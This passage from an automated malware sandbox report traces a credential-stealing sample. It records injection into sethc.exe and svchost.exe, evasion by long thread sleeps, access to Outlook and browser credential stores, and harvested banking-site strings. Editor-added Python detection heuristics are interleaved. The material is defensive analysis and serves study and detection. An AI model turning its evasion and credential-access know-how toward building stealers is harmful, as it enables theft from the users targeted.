Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: playsndsrv.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: oleacc.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | Section loaded: rasadhlp.dll
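The module list for sethc.exe is what makes the credential-theft verdict concrete: an accessibility helper has no reason to load winsqlite3.dll (Chromium "Login Data" and cookie stores are SQLite files; the password_notes schema seen in its memory on this page is from that database), vaultcli.dll and dpapi.dll (what unwraps the stored secrets), and two HTTP stacks (wininet.dll and winhttp.dll) at once. The Python below is an added example, not code from the report or the sample: the per-process module sets are constructed from the "Section loaded" rows above, and the module groupings and the list of processes allowed to touch their own credential stores are the editor's assumptions.

```python
import ntpath

# Constructed from the "Section loaded" rows of this report, one set per process.
MODULE_LOADS = {
    r"C:\Users\user\Desktop\ek8LkB2Cgo.exe": {
        "apphelp.dll", "wsock32.dll", "version.dll", "winmm.dll", "mpr.dll",
        "wininet.dll", "iphlpapi.dll", "userenv.dll", "uxtheme.dll",
        "kernel.appcore.dll", "windows.storage.dll", "wldp.dll", "ntmarta.dll"},
    r"C:\Windows\SysWOW64\sethc.exe": {
        "playsndsrv.dll", "oleacc.dll", "uxtheme.dll", "dui70.dll", "wtsapi32.dll",
        "wininet.dll", "kernel.appcore.dll", "ieframe.dll", "iertutil.dll",
        "netapi32.dll", "version.dll", "userenv.dll", "winhttp.dll", "wkscli.dll",
        "netutils.dll", "sspicli.dll", "windows.storage.dll", "wldp.dll",
        "profapi.dll", "secur32.dll", "mlang.dll", "propsys.dll", "winsqlite3.dll",
        "vaultcli.dll", "wintypes.dll", "dpapi.dll", "cryptbase.dll"},
    r"C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe": {
        "wininet.dll", "mswsock.dll", "dnsapi.dll", "iphlpapi.dll",
        "fwpuclnt.dll", "rasadhlp.dll"},
}

# Module groups (assumption): browser and mail credential stores are SQLite
# files, and the secrets inside them are unwrapped with DPAPI or the Vault API.
CRED_STORE = {"winsqlite3.dll"}
CRED_DECRYPT = {"dpapi.dll", "vaultcli.dll"}
NETWORK = {"wininet.dll", "winhttp.dll", "mswsock.dll", "dnsapi.dll"}
# Processes expected to open their own stores (assumption; extend per estate).
CRED_OWNERS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "thunderbird.exe"}


def credential_access_suspects(loads):
    """Return {image: {"store": [...], "decrypt": [...], "network": [...]}} for
    each process that is not a known credential owner yet has loaded both a
    SQLite engine and a DPAPI/Vault module. The network list is context for
    exfiltration triage, not part of the match."""
    suspects = {}
    for image, modules in loads.items():
        if ntpath.basename(image).lower() in CRED_OWNERS:
            continue
        mods = {m.lower() for m in modules}
        if mods & CRED_STORE and mods & CRED_DECRYPT:
            suspects[image] = {
                "store": sorted(mods & CRED_STORE),
                "decrypt": sorted(mods & CRED_DECRYPT),
                "network": sorted(mods & NETWORK),
            }
    return suspects


if __name__ == "__main__":
    for image, detail in credential_access_suspects(MODULE_LOADS).items():
        print(image)
        for key, names in detail.items():
            print("  %-8s %s" % (key, ", ".join(names)))
```

Image-load telemetry (Sysmon event 7) gives the same fields on a live host. The two-module conjunction keeps the rule quiet: plenty of software loads winsqlite3.dll alone, and dpapi.dll alone is common, but a non-browser loading both is rare enough to page on.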
Source: C:\Windows\SysWOW64\sethc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\sethc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: ek8LkB2Cgo.exe | Static file information: File size 1229824 > 1048576
Source: ek8LkB2Cgo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ek8LkB2Cgo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ek8LkB2Cgo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ek8LkB2Cgo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ek8LkB2Cgo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ek8LkB2Cgo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ek8LkB2Cgo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: sethc.pdbGCTL | source: svchost.exe, 00000002.00000003.1511378407.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1511473960.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000002.3777425420.000000000131E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: RlKZsaoEJNpD.exe, 00000005.00000000.1468541461.0000000000AAE000.00000002.00000001.01000000.00000005.sdmp, RlKZsaoEJNpD.exe, 00000007.00000000.1632177564.0000000000AAE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: ek8LkB2Cgo.exe, 00000000.00000003.1309997616.0000000004080000.00000004.00001000.00020000.00000000.sdmp, ek8LkB2Cgo.exe, 00000000.00000003.1308681911.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1443349259.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1449140378.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.0000000003200000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1561229926.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1558779585.000000000486F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: ek8LkB2Cgo.exe, 00000000.00000003.1309997616.0000000004080000.00000004.00001000.00020000.00000000.sdmp, ek8LkB2Cgo.exe, 00000000.00000003.1308681911.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1443349259.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1449140378.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.0000000003200000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, sethc.exe, 00000006.00000002.3778379933.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1561229926.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1558779585.000000000486F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdb | source: svchost.exe, 00000002.00000003.1511378407.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1511473960.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000002.3777425420.000000000131E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778868913.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000031DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1865208225.000000000692C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778868913.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000031DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1865208225.000000000692C000.00000004.80000000.00040000.00000000.sdmp
Source: ek8LkB2Cgo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ek8LkB2Cgo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ek8LkB2Cgo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ek8LkB2Cgo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ek8LkB2Cgo.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0050E01E LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00516B05 push ecx; ret 0_2_00516B18
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041504A push edx; retf 2_2_0041504D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040B05D push 7EE3812Dh; retf 2_2_0040B062
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041502C push esp; ret 2_2_0041503C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403830 push eax; ret 2_2_00403832
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041889B pushfd ; ret 2_2_004188A3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D99E push eax; retf 2_2_0040D9A1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DB46 pushad ; iretd 2_2_0040DB6B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414BF2 push 00000067h; ret 2_2_00414C87
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418B87 push 6666FE1Ah; iretd 2_2_00418B8C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041939C push ss; retf 2_2_004193FA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DC21 push eax; retf 2_2_0040DC22
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041ACC2 pushad ; iretd 2_2_0041ACCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414621 push ebx; retn 8A14h 2_2_00414671
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004147C3 push eax; ret 2_2_00414852
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0320225F pushad ; ret 2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032027FA pushad ; ret 2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx 2_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0320283D push eax; iretd 2_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0320135E push eax; iretd 2_2_03201369
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_04BF09AD push ecx; mov dword ptr [esp], ecx 6_2_04BF09B6
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C9C39F push FFFFFFB9h; ret 6_2_00C9C3AA
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C9244E push esp; iretd 6_2_00C9244F
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C9266E push ebp; ret 6_2_00C9266F
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C95068 pushfd ; ret 6_2_00C95070
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00CA1235 push esp; retf 6_2_00CA1238
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C95354 push 6666FE1Ah; iretd 6_2_00C95359
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C9748F pushad ; iretd 6_2_00C97498
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C917F9 push esp; ret 6_2_00C91809
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C8782A push 7EE3812Dh; retf 6_2_00C8782F
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C9DB4A push ebp; retf 6_2_00C9DB62
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00558111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0050EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0051123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sethc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sethc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sethc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sethc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sethc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | API/Special instruction interceptor: Address: 15F85AC
Source: C:\Windows\SysWOW64\sethc.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\sethc.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\sethc.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\sethc.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\sethc.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\sethc.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\sethc.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\sethc.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E rdtsc
Source: C:\Windows\SysWOW64\sethc.exe | Window / User API: threadDelayed 4802
Source: C:\Windows\SysWOW64\sethc.exe | Window / User API: threadDelayed 5171
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Evaded block: after key decision (graph_0-93251)
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-94035)
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
Source: C:\Windows\SysWOW64\sethc.exe | API coverage: 2.7 %
Source: C:\Windows\SysWOW64\sethc.exe TID: 8108 | Thread sleep count: 4802 > 30
Source: C:\Windows\SysWOW64\sethc.exe TID: 8108 | Thread sleep time: -9604000s >= -30000s
Source: C:\Windows\SysWOW64\sethc.exe TID: 8108 | Thread sleep count: 5171 > 30
Source: C:\Windows\SysWOW64\sethc.exe TID: 8108 | Thread sleep time: -10342000s >= -30000s
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128 | Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128 | Thread sleep count: 32 > 30
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128 | Thread sleep time: -48000s >= -30000s
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128 | Thread sleep count: 33 > 30
Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe TID: 8128 | Thread sleep time: -33000s >= -30000s
Source: C:\Windows\SysWOW64\sethc.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\sethc.exe | Last function: Thread delayed
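The thread-sleep rows above are the sandbox's stalling heuristic: a thread that calls Sleep more than 30 times, or whose delays add up to 30 s or more, is treated as trying to outlast the analysis window rather than do useful work, and the delayed thread is reported as the process's last activity. The Python below is an added example, not code from the report or the sample, that applies those two thresholds to a constructed Sleep-call log. The input is sized so that the sethc.exe thread's 4802 calls total 9,604,000 and the RlKZsaoEJNpD.exe thread's 32 calls total 60,000, matching the figures above if those are milliseconds; the report does not state its unit, so that reading, the per-call durations and the benign explorer.exe thread are the editor's assumptions.

```python
from collections import defaultdict

# Thresholds as printed in the report rows above (count > 30, total >= 30 s).
MIN_CALLS = 30
MIN_TOTAL_MS = 30_000

# Constructed Sleep-call log: (image, thread id, requested delay in ms).
SAMPLE_CALLS = (
    [("sethc.exe", 8108, 2000)] * 4802          # 4802 x 2000 ms = 9,604,000 ms
    + [("RlKZsaoEJNpD.exe", 8128, 1875)] * 32   # 32 x 1875 ms = 60,000 ms
    + [("explorer.exe", 4242, 10)] * 5          # benign: few calls, short total
)


def aggregate_sleeps(sleep_calls):
    """Per-(image, tid) call count and summed delay, as {(image, tid): (count, total_ms)}."""
    count = defaultdict(int)
    total = defaultdict(int)
    for image, tid, ms in sleep_calls:
        count[(image, tid)] += 1
        total[(image, tid)] += ms
    return {key: (count[key], total[key]) for key in count}


def stalling_threads(sleep_calls, min_calls=MIN_CALLS, min_total_ms=MIN_TOTAL_MS):
    """Threads that trip either threshold. Either condition alone is enough:
    a sleep loop of many short calls beats a count threshold, a single
    multi-minute Sleep beats the time threshold, and sandboxes need to
    catch both forms of stalling."""
    return {key: (n, ms) for key, (n, ms) in aggregate_sleeps(sleep_calls).items()
            if n > min_calls or ms >= min_total_ms}


if __name__ == "__main__":
    for (image, tid), (n, ms) in stalling_threads(SAMPLE_CALLS).items():
        print("%s TID %d: %d Sleep calls, %.0f s total" % (image, tid, n, ms / 1000))
```

The same aggregation works on API-monitor output from any sandbox; the useful tuning knob is the per-call floor, since a loop of 1 ms sleeps is busy-waiting rather than stalling and should be excluded before counting.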
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00536CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_005360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_005363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0053EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0053F56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0053F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00541B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00541C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00541F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\sethc.exe | Code function: 6_2_00C9C670 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0050DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: 3MZ6696O.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 3MZ6696O.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 3MZ6696O.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 3MZ6696O.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 3MZ6696O.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 3MZ6696O.6.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 3MZ6696O.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 3MZ6696O.6.dr | Binary or memory string: AMC password management pageVMware20,11696492231
Source: 3MZ6696O.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 3MZ6696O.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 3MZ6696O.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 3MZ6696O.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 3MZ6696O.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 3MZ6696O.6.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 3MZ6696O.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 3MZ6696O.6.dr | Binary or memory string: discord.comVMware20,11696492231f
Source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777472925.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1872544120.00000110069BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sethc.exe, 00000006.00000002.3780922348.0000000007EAB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492
Source: 3MZ6696O.6.dr | Binary or memory string: global block list test formVMware20,11696492231
